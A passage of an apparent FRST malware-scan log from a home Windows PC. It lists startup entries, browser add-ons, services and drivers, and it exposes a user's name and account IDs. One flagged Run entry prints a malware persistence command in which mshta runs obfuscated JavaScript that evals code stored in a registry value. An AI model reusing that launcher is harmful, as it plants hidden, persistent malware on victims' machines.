Filter\mfp.exe [3331408 2013-08-19] (McAfee, Inc.) HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2000896 2014-04-04] (iSkySoft) HKLM-x32\...\Run: [PMBVolumeWatcher] => C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe [2669568 2015-04-17] (Sony Corporation) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597552 2015-08-04] (Oracle Corporation) HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.) HKLM\...\RunOnce: [SRS_APO_Install] => C:\WINDOWS\system32\SRSLabs\{176F4E15-8F7C-4833-ADED-81FAE8CCD186}\slInit64.dll [214776 2015-07-03] (SRS Labs, Inc.) HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Power2GoExpress8] => 0 HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Google Update] => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [107848 2015-04-30] (Google Inc.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [HP ENVY 7640 series (NET)] => C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe [3483656 2014-08-22] (Hewlett-Packard Development Company, LP) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [iFunBox] => C:\Program Files (x86)\i-Funbox DevTeam\iFunBox_x64.exe [2783232 2015-07-27] (i-Funbox.com) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [MurGee.com Auto Clicker] => C:\Users\Kyle Aniel\AppData\Roaming\Auto Clicker\AutoClicker.exe [124072 2016-04-20] (MurGee.com) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify Web Helper] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1555056 2016-08-13] (Spotify Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\Spotify.exe [6937200 2016-08-13] (Spotify Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Air Mouse Server] => C:\Users\Kyle Aniel\Downloads\AirMouse.exe [202240 2016-10-01] () HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [f.lux] => C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**bquflhx<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:RHY2M="cnlfCDX";P1x=new%20ActiveXObject("WScript.Shell");Bvpcj7n4V="bzjV";mzF9K7=P1x.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");N1QuJVU="T";eval(mzF9K7); (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**xwhehhqlxw<*>] => "C:\Users\Kyle Aniel\AppData\Local\f70e5\db038.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**ofiy<*>] => "C:\Users\Kyle Aniel\AppData\Local\14ea33ba\15ee12e9.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\RunOnce: [Uninstall C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64" HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4299968 2016-06-22] (Disc Soft Ltd) HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe [986648 2016-09-29] (BlueStack Systems, Inc.) HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation) Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0813b25f.lnk [2016-10-20] Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3509d.lnk [2016-10-20] Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2015-11-13] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation) GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1010\User: Restriction <======= ATTENTION GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1002\User: Restriction <======= ATTENTION GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1001\User: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{849d57b1-e8c7-4cf9-a689-c5cbbe5b3d71}: [DhcpNameServer] 192.168.48.1 Tcpip\..\Interfaces\{caebb8ce-2c7b-43c1-bdca-7787c2b0f2a1}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1 HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1 HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1 SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = SearchScopes: HKLM-x32 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms} SearchScopes: HKU\.DEFAULT -> {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> DefaultScope {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms} SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1010 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-10-08] (Microsoft Corporation) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-10-08] (Microsoft Corporation) BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-16] (Oracle Corporation) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-04-04] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-10-16] (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard) Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-07-07] (McAfee, Inc.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-07-07] (McAfee, Inc.) FireFox: ======== FF DefaultProfile: n8nht5ff.default FF ProfilePath: C:\Users\banie_000\AppData\Roaming\Mozilla\Firefox\Profiles\n8nht5ff.default [2016-07-30] FF SelectedSearchEngine: Mozilla\Firefox\Profiles\n8nht5ff.default -> Search Provided by Bing FF DefaultSearchEngine: Mozilla\Firefox\Profiles\n8nht5ff.default -> Search Provided by Bing FF NewTab: Mozilla\Firefox\Profiles\n8nht5ff.default -> about:newtab FF Keyword.URL: Mozilla\Firefox\Profiles\n8nht5ff.default -> user_pref("keyword.URL", true); FF Homepage: Mozilla\Firefox\Profiles\n8nht5ff.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04&PTAG=ICO-f2e8b855 FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-10-13] FF SearchPlugin: C:\Users\banie_000\AppData\Roaming\Mozilla\Firefox\Profiles\n8nht5ff.default\searchplugins\search provided by bing.xml [2016-07-30] FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2016-08-12] [not signed] FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-07-11] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-11] () FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-07-07] () FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-11] () FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.) FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] () FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2016-08-25] (Google) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-16] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-16] (Oracle Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-07-07] () FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2014-12-08] (McAfee, Inc.) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-10-07] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy.dll [2013-01-01] ( ROBLOX Corporation) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher64 -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy64.dll [2013-01-01] ( ROBLOX Corporation) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/O1DPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kyle Aniel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS) Chrome: ======= CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C215US756D20151120&p={searchTerms} CHR DefaultSearchKeyword: Default -> McAfee CHR Profile: C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default [2016-10-02] CHR Extension: (Google Docs) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-04] CHR Extension: (SiteAdvisor) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-08-04] CHR Extension: (Chrome Web Store Payments) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-04] CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [599944 2014-12-04] (Autodesk Inc.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.) S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-09-29] (BlueStack Systems, Inc.) R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-09-29] (BlueStack Systems, Inc.) S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [466456 2016-09-29] (BlueStack Systems, Inc.) R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe [76616 2016-06-20] (Google Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3291848 2016-10-08] (Microsoft Corporation) S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-06-22] (Disc Soft Ltd) R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [10220624 2016-10-13] () [File not signed] R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2014-06-03] (Hewlett-Packard Company) [File not signed] R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company) R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.) R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation) S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed] R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [365032 2016-01-26] (Intel Corporation) R2 IHA_MessageCenter; C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe [372736 2015-01-27] (Verizon) [File not signed] R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed] S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [166152 2016-10-03] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [993824 2016-07-07] (McAfee, Inc.) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [334608 2013-07-24] (McAfee, Inc.) R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\\McCSPServiceHost.exe [1910000 2016-05-31] (McAfee, Inc.) R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [816128 2016-06-21] (McAfee, Inc.) S4 McOobeSv2; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-04-26] (McAfee, Inc.) R2 mfeicfcore; C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe [2763896 2013-08-19] (McAfee, Inc.) R2 mfeicfupdate; C:\Program Files (x86)\Internet Content Filter\UpdateService.exe [2260208 2013-08-19] (McAfee, Inc.) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-06-23] (McAfee, Inc.) R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-04-26] (McAfee, Inc.) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1454216 2016-06-17] (McAfee, Inc.) S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed] R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1045336 2016-05-25] (Intel Security, Inc.) R2 PMBDeviceInfoProvider; C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe [494592 2015-04-17] (Sony Corporation) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [255096 2015-12-11] (Synaptics Incorporated) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation) R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-09-29] (BlueStack Systems) S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-09-27] (Bluestack System Inc. ) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [78632 2016-04-27] (McAfee, Inc.) R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.) R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-07-30] (Disc Soft Ltd) R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-07-30] (Disc Soft Ltd) S3 HipShieldK; 